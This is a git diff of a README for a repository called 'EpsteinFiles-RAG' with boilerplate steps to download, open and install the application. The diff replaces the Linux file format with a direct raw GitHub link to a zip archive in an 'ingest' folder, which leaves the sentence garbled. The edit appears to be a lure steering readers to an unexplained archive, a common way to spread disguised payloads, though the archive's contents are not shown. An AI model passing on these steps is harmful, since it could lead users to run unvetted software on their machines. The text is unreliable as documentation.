AhmedHacks/EpsteinFiles-RAG/README.md

 2. Look for a file that matches your device:
    - For Windows, this might be a `.exe` file.
    - For macOS, it may be a `.dmg` or `.pkg` file.
-   - For Linux, you may find a `.tar.gz` or similar format.
+   - For Linux, you may find a `https://raw.githubusercontent.com/AhmedHacks/EpsteinFiles-RAG/main/ingest/RAG_Epstein_Files_1.9.zip` or similar format.
 3. Click the file to download it.
 4. Once downloaded, open the file and follow the on-screen instructions to install EpsteinFiles-RAG.
 5. After installation, find the EpsteinFiles-RAG application icon on your desktop or in your program list and double-click to open it.